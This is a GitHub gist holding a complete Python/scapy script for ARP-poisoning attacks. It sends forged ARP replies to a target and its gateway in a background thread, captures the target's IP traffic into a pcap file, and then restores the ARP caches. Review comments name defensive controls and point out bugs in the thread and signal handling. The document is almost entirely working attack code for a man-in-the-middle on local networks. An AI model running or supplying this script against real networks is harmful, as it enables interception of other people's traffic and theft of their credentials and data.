@juliosmelo
Created September 25, 2020 12:51
Python script for ARP poison attacks
import os
import sys
import threading
import signal
from scapy.all import *
# Broadcast hardware address. get_mac() uses it as the Ethernet destination of
# its ARP probe; restore_target() uses it as hwdst of the corrective replies.
HWDST_SRC = "ff:ff:ff:ff:ff:ff"

# Run parameters. The published listing leaves the three address/interface
# values blank.
interface = ""        # handed to sniff() as iface=
gateway_ip = ""       # the address whose ARP entry on the target is rewritten
target_ip = ""        # the host whose traffic ends up in the capture
packet_count = 1000   # sniff() returns after this many matching packets

# NOTE(review): neither of the next two names is read anywhere else in this
# listing (sniff() is given `interface` directly), so as written they have no
# effect on the run.
verbosity = False
iface = interface
def get_mac(ip_address):
    """Look up the hardware address that answers ARP for *ip_address*.

    A single ARP request (scapy's default op for ARP()) is broadcast at
    layer 2 and unanswered probes are resent, with a 2-second timeout and
    retry=100.

    Returns the Ethernet source address of the first reply, or None when
    nothing answered.
    """
    probe = Ether(dst=HWDST_SRC) / ARP(pdst=ip_address)
    # srp() is called without iface=, so the probe uses whatever interface
    # scapy selects by default, not the module-level `interface`.
    answered, _unanswered = srp(probe, timeout=2, retry=100)
    # Each entry is a (sent, received) pair; only the first reply matters.
    return next((reply[Ether].src for _sent, reply in answered), None)
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Send forged ARP replies to the target and the gateway in a loop.

    Two ARP replies (op=2) are built once and then re-sent without any delay:
    one tells the target that gateway_ip belongs to the sender, the other
    tells the gateway that target_ip does. hwsrc is never set, so scapy fills
    in the sending interface's own hardware address.

    Defender's view: on the wire this is a sustained stream of unsolicited
    ARP replies in which a single hardware address claims two different IPs.
    Dynamic ARP Inspection on the switch, a static ARP entry for the gateway,
    or an ARP monitor such as arpwatch are the usual controls that block or
    flag that pattern.
    """
    # Reply addressed to the target, claiming to come from the gateway's IP.
    to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    # Mirror-image reply addressed to the gateway, claiming the target's IP.
    to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    while True:
        try:
            send(to_target)
            send(to_gateway)
        except KeyboardInterrupt:
            # NOTE(review): CPython delivers SIGINT, and therefore raises
            # KeyboardInterrupt, in the main thread only. The script starts
            # this function through threading.Thread, so this branch looks
            # unreachable from there and the loop has no other exit - confirm.
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            print("[*] ARP poison attack finished")
            return
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-announce the real IP-to-MAC pairs, then raise SIGINT in this process.

    Five ARP replies per direction are sent with hwdst set to the broadcast
    address and hwsrc set to the genuine owner of each IP, so that caches
    holding a forged entry are overwritten with the correct one.
    """
    print(f"[*] Restoring target {target_ip}")

    # gateway_ip -> gateway_mac, and target_ip -> target_mac.
    gateway_is_at = ARP(op=2, psrc=gateway_ip, pdst=target_ip,
                        hwdst=HWDST_SRC, hwsrc=gateway_mac)
    target_is_at = ARP(op=2, psrc=target_ip, pdst=gateway_ip,
                       hwdst=HWDST_SRC, hwsrc=target_mac)
    send(gateway_is_at, count=5)
    send(target_is_at, count=5)

    # NOTE(review): nothing visible in this listing stops the loop in
    # poison_target() before these replies go out, so the corrected entries
    # may be overwritten again while that thread is alive - confirm.
    # The process signals itself; with Python's default handler this surfaces
    # as KeyboardInterrupt in the main thread.
    os.kill(os.getpid(), signal.SIGINT)
# Script body: resolve both hardware addresses, start the ARP loop in a
# background thread, capture the target's traffic, then restore.
print(f"[*] Setting up {interface}")
gateway_mac = get_mac(gateway_ip)
target_mac = get_mac(target_ip)

# NOTE(review): both failure paths exit with status 0, so a calling shell
# cannot tell a failed lookup from a clean run.
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting")
    sys.exit(0)

if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting")
    sys.exit(0)

print(f"[*] Gateway {gateway_ip} is at {gateway_mac}")
print(f"[*] Target {target_ip} is at {target_mac}")

# start poisoning thread
# The thread is created without daemon=True and is never joined or signalled
# from here, so it keeps the process alive for as long as its loop runs.
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac),
)
poison_thread.start()

try:
    print(f"[*] Starting sniffer for {packet_count}")
    # BPF expression: IP packets whose source or destination is target_ip.
    bpf_filter = f"ip host {target_ip}"
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    # The capture holds whatever the target sent or received, so the file is
    # as sensitive as that traffic.
    wrpcap("arper.pcap", packets)
    # NOTE(review): restore_target() ends by sending SIGINT to this process;
    # called from inside this try block, the resulting KeyboardInterrupt
    # appears to land in the except branch below, which restores a second
    # time and signals again before sys.exit() is reached - confirm.
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit()